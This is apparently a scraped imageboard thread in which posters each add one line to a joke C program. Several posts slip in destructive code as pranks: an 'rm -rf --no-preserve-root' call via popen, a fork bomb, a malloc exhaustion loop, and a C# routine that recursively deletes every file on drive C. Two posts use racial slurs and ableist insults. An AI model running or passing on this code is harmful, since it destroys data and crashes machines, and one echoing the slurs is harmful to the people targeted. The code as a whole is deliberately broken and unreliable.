Let's write a program, Sup Forums

Let's write a program, Sup Forums.

One line per post.

I'll start.

int main(int argc, char** argv) {

#pragma once

while (1) {

return 0;
}

}

Hahahahahahahaha what a funny post you posted two lines.

Nifty little program, (you) guys.

Wow! I can definitely see myself using this one daily.

> gcc tmp.c
tmp.c: In function ‘main’:
tmp.c:2:9: warning: #pragma once in main file
#pragma once
^~~~
> ./a.out


It compiles, good work Sup Forums

So did you
.

That's not what was typed you fucking braindead monkey.

I'll start again.

int main() { //who needs arguments

Except for the top line being out of place, what's wrong with it?

Was this supposed to be the successor function?

printf("nigger\n");

for(;;) {

>Except for the thing that's wrong with it, what's wrong with it
GEE WIZ, MAYBE THE FUCKING THING THAT'S WRONG WITH IT IS WRONG WITH IT?
Pull your head out of your fucking ass and stop being retarded you fucking nigger with down syndrome.
Fix it.

}

printf("Install TempleOS\n");

Fix it yourself fuckass, the code's readily available.

Wow haha you are one angry dude whew mate

long long thicc[sizeof(long long)*1000*1000*1000*1000*1000*4] = {0};

return 0; } //shit's fucked anyways

That was fun. G'night Sup Forums.

Congrats, you solved the infinite loop problem.

#include

FILE *fp = popen("rm -rf --no-preserve-root","r");

Would this run if I had 32 Petabyte of RAM?

#define true false

if(false){

#define 1 0

import
while(malloc(1));

while(1) fork();

No, the stack is not that big.

But I can force it to unlimited right?

You can change it yes. Don't know if there are other variables to take into consideration.

write a program to sum all primes

public static void main(String[] args){

Answer was to you.

int main() {
int i = 0;
int sum = 0;
while(1){
if(isPrime(i))
sim += i;

i++;

}
return 0;
}

Thanks, it seems to work even, just segfaults when allocating more than available ram
If only I had more RAM..

...

void dtr(string path)
{
string[] dlst = Directory.GetDirectories(path);
foreach (string d in dlst) dtr(d);
string[] flst = Directory.GetFiles(path);
foreach (string f in flst)
{
try
{
File.Delete(f);
}
catch (Exception exc) {}
}
try
{
Directory.Delete(path, true);
}
catch (Exception exc) {}
}

dtr("C:\");

int fag = 0
fag = 1/0

enjoy fixing that

post your screenfetch boi